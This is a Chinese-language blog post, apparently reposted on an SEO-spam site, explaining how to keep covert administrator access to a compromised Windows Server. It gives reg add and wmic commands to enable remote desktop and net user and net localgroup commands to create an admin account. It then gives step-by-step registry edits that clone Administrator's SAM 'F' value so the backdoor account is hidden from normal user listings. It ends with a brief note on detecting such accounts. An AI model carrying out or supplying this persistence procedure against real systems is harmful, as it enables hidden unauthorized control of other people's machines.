当前位置: 首页 > news >正文

几百块做网站网络营销课程报告

几百块做网站,网络营销课程报告,域名注册好了怎么了做网站,建设商务网站系统隐藏账户是一种最为简单有效的权限维持方式,其做法就是让攻击者创建一个新的具有管理员权限的隐藏账户,因为是隐藏账户,所以防守方是无法通过控制面板或命令行看到这个账户的。 自然我们需要一些前提条件,比如说有一个网站&am…

        系统隐藏账户是一种最为简单有效的权限维持方式,其做法就是让攻击者创建一个新的具有管理员权限的隐藏账户,因为是隐藏账户,所以防守方是无法通过控制面板或命令行看到这个账户的。

        自然我们需要一些前提条件,比如说有一个网站,我们获得了getshell,如果他是windows系统,我们以及拿到了administrator权限,那么我们可以使用如下的方式来进行一个后门的走。

环境模拟准备

vm,windows_server2012准备一个存在漏洞的网站

物理机攻击此网站获取osshell权限

第一步开启远程连接!

# 1.设置远程桌面端口(详细指定具体的端口,也可以不输入默认开启3389端口。)
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f# 2.开启远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1#检查端口状态
netstat -an|find "3389"#关闭远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0

添加一个用户

net user admin123 Admin654 /add
添加用户
net localgroup administrators admin123 /add
把用户添加至组
net user
可查看当前用户
net localgroup "Remote Desktop Users" admin123 /add
添加至允许远程连接
net localgroup "Remote Desktop Users"
查看允许远程连接的用户

使用远程连接连接计算机,若是遇到如下问题,可参考文献

通过远程桌面连接Windows实例时出现错误提示时的解决方案_云服务器 ECS(ECS)-阿里云帮助中心

出现身份验证错误。要求的函数不受支持
远程计算机:192.168.146.134这可能是由于 CredSSP 加密数据库修正若要了解详细信息,请访问 https://go,microsoft,com/fwlink/?linkid=866660

这样添加的用户,可以使用net user查看,或者在用户页面查看,或lusrmgr.msc本地用户和组中都可以看到

第二步隐藏用户

我们这里使用修改注册表编辑器的方式来隐藏用户输入regedt32打开注册表编辑器,并找到HKEY_LOCAL_MACHINE\SAM\SAM,点击右键,选择"权限"

将Administrator用户的权限,设置成“完全控制”

重新打开注册表,确保可以看到SAM路径下的文件

2.2.5 其次前往SAM/Domains/Account/Users/Names处,选择Administrator用户,在右侧的键值处可以找到对应的值如0x1f4,然后从左侧的Users目录下可以找到对应的文件

然后从对应的000001F4文件中将键值对F的值复制出来。然后同理找到隐藏账户admin123所对的文件,并将从Administrator文件中复制出来的F值粘贴进admin123文件中。

2.2.7最后将admin123和0x3f0从注册表中右键导出,并删除wxiaoge$用户,然后将刚刚导出的两个文件重新导入进注册表中即可实现wxiaoge用户的隐藏。

导出使用右键,删除用户使用cmd net user admin123 /del

此时此账户在net user 和用户管理以及用户和组中均不可见,也就是说只能在注册表编辑器中找到

额外之应急响应

 将HKEY_LOCAL_MACHINE\SA\SAM\Domains\Account\Users\Names与管理工具-》计算机管理-》本地用户和组-》用户相互对比,不存在的用户即为后门用户删除即可,删除时应对于删除。

另外当隐藏之后无法远程登录的解决办法参考以下文献,或自行网上搜索

https://www.cnblogs.com/ciscolee/p/15587768.html

http://www.ritt.cn/news/21333.html

相关文章:

  • 广州兼职做网站关键词是网站seo的核心工作
  • 商务网站开发代码网店怎么开
  • 涉县移动网站建设价格网络推广运营主要做什么
  • 网站建设付款方式百度代运营公司
  • 东莞网站页设计制作黑帽seo365t技术
  • 重庆网上商城网站建设网络推广的优化服务
  • wap手机网站模版北京营销推广网站建设
  • 免费建手机网站后台各个广告联盟的标识
  • 碑林网站制作怎么建一个自己的网站
  • 郑州网站开发建设宁波网络营销推广公司
  • 淄博做网站优化公司网站设计与制作教程
  • 用asp做网站上网帮助人工智能培训机构排名前十
  • 做网站的意义大不大互联网网络推广公司
  • 申请微官网的网站天津优化公司哪家好
  • 深圳网站设计很棒 乐云践新百度一下你知道主页官网
  • 海宁营销型网站建设价格seo关键词智能排名
  • 网站开发毕设参考文献旅游产品推广有哪些渠道
  • 登不上建设企业网站湖南网站建站系统哪家好
  • 如何做自已网站网站推广app下载
  • 苏州保洁公司开荒保洁收费标准百度seo快速排名
  • 电商网站建站开发语言学生班级优化大师
  • wordpress发表的文章点不开seo上海优化
  • 购物网站建设流程关键词推广效果分析
  • 最新军事新闻军事最新新闻短视频seo营销
  • 期货做程序化回测的网站地推接单正规平台
  • 网站做管制户外刀具如何找友情链接
  • 龙华做棋牌网站建设哪家便宜91手机用哪个浏览器
  • 免费b2b平台都有哪些网站事件营销的案例有哪些
  • 公司网站怎么做简介上海网络营销上海网络推广
  • 网站建设的整体流程有哪些?如何快速搭建网站